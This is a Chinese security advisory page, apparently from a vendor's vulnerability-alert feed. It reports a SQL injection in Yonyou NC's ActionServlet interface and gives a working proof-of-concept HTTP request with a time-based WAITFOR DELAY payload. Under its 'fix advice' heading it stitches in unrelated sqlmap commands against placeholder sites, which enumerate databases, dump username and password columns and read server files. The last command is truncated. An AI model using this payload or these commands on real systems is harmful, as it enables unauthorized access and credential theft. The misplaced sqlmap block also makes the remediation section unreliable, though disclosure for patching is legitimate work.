用友NC SQL注入漏洞POC

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

用友NC以“全球化集团管控、行业化解决方案、全程化电子商务、平台化应用集成”的管理业务理念而设计，采用J2EE架构和先进开放的集团级开发平台UAP，形成了集团管控8大领域15大行业68个细分行业的解决方案。

0x03 漏洞详情

漏洞类型：SQL注入

影响：窃取敏感信息

简述：用友NC ActionServlet接口处存在SQL注入漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

0x04 影响版本

用友NC

0x05 POC

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:5'--+&unitID=public HTTP/1.1
Host: {host}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
SOAPAction: http://tempuri.org/GetHomeInfo
Accept-Encoding: identity
Accept: */*
Connection: keep-alive

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://www.yonyou.com/

python sqlmap.py -u "http://www.vuln.cn/post.php?id=1" --proxy "http://127.0.0.1:1080"

python sqlmap.py  -u "http://www.vuln.cn" –cookie "id=11" --level 2

python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3

python sqlmap.py -u "http://www.vuln.cn/post.php?id=1"  --dbms mysql  --dbs

python sqlmap.py -u "http://www.vuln.cn/post.php?id=1"  --dbms mysql  -D test --tables

python sqlmap.py -u "http://www.vuln.cn/post.php?id=1"  --dbms mysql  -D test -T admin –-columns

python sqlmap.py -u "http://www.vuln.cn/post.php?id=1"  --dbms mysql -D test -T admin -C "username,password" --dump

python sqlmap.py -r "c:request.txt" -p id –dbms mysql –file-read="e:wwwasconfig.p

上一：漏洞预警 | PuTTY密钥泄露漏洞

下一：【漏洞预警】IP-guard WebServer < 4.82.0609.0任意文件读取漏洞

微信扫描关注我们

周一至周五（工作日） 09:00-18:00
周末/法定节假日（值班）09:00-18:00

联系人：徐泮

手机：17620028178

邮件：1536715554@qq.com

地址：广州市天河区思成路19号五号楼2F C29

热门

用友NC SQL注入漏洞POC

暂无